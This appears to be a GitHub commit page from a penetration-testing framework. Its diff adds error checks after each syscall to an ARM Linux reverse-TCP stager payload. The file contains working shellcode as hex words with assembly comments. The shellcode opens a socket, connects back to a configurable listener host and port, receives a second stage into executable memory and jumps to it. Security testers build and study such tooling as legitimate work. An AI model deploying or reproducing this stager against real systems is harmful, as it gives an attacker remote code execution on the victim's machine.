Skip to content

Commit 1862900

Browse files
tkmrutkmru
committed
add error handling
1 parent 17d7bb0 commit 1862900

File tree

1 file changed

+26
-8
lines changed

1 file changed

+26
-8
lines changed

modules/payloads/stagers/linux/armle/reverse_tcp.rb

Lines changed: 26 additions & 8 deletions
Original file line numberDiff line numberDiff line change
@@ -34,56 +34,74 @@ def initialize(info = {})
3434
{
3535
'Offsets' =>
3636
{
37-
'LPORT' => [ 182, 'n' ],
38-
'LHOST' => [ 184, 'ADDR' ],
37+
'LPORT' => [ 242, 'n' ],
38+
'LHOST' => [ 244, 'ADDR' ],
3939
},
4040
'Payload' =>
4141
[
42-
0xe59f70b4, # ldr r7, [pc, #180] ; set 281(0x119) to r7
42+
0xe59f70f0, # ldr r7, [pc, #240] ; set 281(0x119) to r7
4343
0xe3a00002, # mov r0, #2
4444
0xe3a01001, # mov r1, #1
4545
0xe3a02006, # mov r2, #6
4646
0xef000000, # svc 0x00000000 ; invoke socket
47+
0xe3500000, # cmp r0, #0
48+
0xba000031, # blt 817c <failed>
4749
0xe1a0c000, # mov ip, r0
4850
0xe2877002, # add r7, r7, #2 ; set 283(0x11b) to r7
49-
0xe28f1090, # add r1, pc, #144 ; set 0x0a1a0002 to r1
51+
0xe28f10c4, # add r1, pc, #196 ; set first .word addr to r1
5052
0xe3a02010, # mov r2, #16
5153
0xef000000, # svc 0x00000000 ; invoke connect
54+
0xe3500000, # cmp r0, #0
55+
0xba00002a, # blt 817c <failed>
5256
0xe1a0000c, # mov r0, ip
5357
0xe24dd004, # sub sp, sp, #4
5458
0xe2877008, # add r7, r7, #8 ; set 291(0x123) to r7
5559
0xe1a0100d, # mov r1, sp
5660
0xe3a02004, # mov r2, #4
5761
0xe3a03000, # mov r3, #0
5862
0xef000000, # svc 0x00000000 ; invoke recv
63+
0xe3500000, # cmp r0, #0
64+
0xba000021, # blt 817c <failed>
5965
0xe59d1000, # ldr r1, [sp]
60-
0xe59f3070, # ldr r3, [pc, #112] ; set 0xfffff000 to r3
66+
0xe59f3094, # ldr r3, [pc, #148] ; set 0xfffff000 to r3
6167
0xe0011003, # and r1, r1, r3
6268
0xe3a02001, # mov r2, #1
6369
0xe1a02602, # lsl r2, r2, #12
6470
0xe0811002, # add r1, r1, r2 ; set 0x1000 to r1
6571
0xe3a070c0, # mov r7, #192 ; set 192(0xC0) to r7
6672
0xe3e00000, # mvn r0, #0 ; set 0xffffffff to r0
6773
0xe3a02007, # mov r2, #7
68-
0xe59f3054, # ldr r3, [pc, #84] ; set 0x1022 to r3
74+
0xe59f3078, # ldr r3, [pc, #120] ; set r3 to 0x1022
6975
0xe1a04000, # mov r4, r0
7076
0xe3a05000, # mov r5, #0
7177
0xef000000, # svc 0x00000000 ; invoke mmap2
78+
0xe3500000, # cmp r0, #0
79+
0xba000012, # blt 817c <failed>
7280
0xe2877063, # add r7, r7, #99 ; set 291(0x123) to r7
7381
0xe1a01000, # mov r1, r0
7482
0xe1a0000c, # mov r0, ip
7583
0xe3a03000, # mov r3, #0
76-
0xe59d2000, # loop: ldr r2, [sp]
84+
# loop:
85+
0xe59d2000, # ldr r2, [sp]
7786
0xe2422ffa, # sub r2, r2, #1000
7887
0xe58d2000, # str r2, [sp]
7988
0xe3520000, # cmp r2, #0
8089
0xda000002, # ble 80fc <last>
8190
0xe3a02ffa, # mov r2, #1000
8291
0xef000000, # svc 0x00000000 ; invoke recv
92+
0xe3500000, # cmp r0, #0
93+
0xba000005, # blt 817c <failed>
8394
0xeafffff7, # b 80dc <loop>
84-
0xe2822ffa, # last: add r2, r2, #1000
95+
# last:
96+
0xe2822ffa, # add r2, r2, #1000
8597
0xef000000, # svc 0x00000000 ; invoke recv
98+
0xe3500000, # cmp r0, #0
99+
0xba000000, # blt 817c <failed>
86100
0xe1a0f001, # mov pc, r1
101+
# failed:
102+
0xe3a07001, # mov r7, #1
103+
0xe3a00001, # mov r0, #1
104+
0xef000000, # svc 0x00000000
87105
0x5c110002, # .word 0x5c110002
88106
0x0100007f, # .word 0x0100007f
89107
0x00000119, # .word 0x00000119

0 commit comments

Comments
 (0)